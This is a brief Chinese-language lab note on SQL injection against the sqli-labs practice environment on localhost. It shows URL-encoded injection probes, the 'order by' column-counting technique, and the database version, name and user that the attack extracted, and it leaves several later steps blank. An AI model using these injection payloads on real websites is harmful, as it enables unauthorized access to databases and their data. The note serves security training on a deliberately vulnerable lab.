SQL注入:将SQL语句通过变量传递给web内部的查询语句。
第一节回显注入练习:sqli-labs-Less-1
1、判断注入点
http://127.0.0.1:8880/Less-1/?id=1%27%20and%201=1%20--+
页面正常
http://127.0.0.1:8880/Less-1/?id=1%27%20and%201=2%20--+
页面异常
猜解列数:
order by x;--按照第几列进行排序,直到异常
报错回显:
在2和3位置上获取信息:
数据库版本:version() 5.7.26
数据库名字:database() security
数据库用户:user() sqli@localhost
操作系统:@@version_compile_os Win64
获取表名:
获取列名:
获取users表里的信息:
sqli-labs-Less-2与Less-1类似。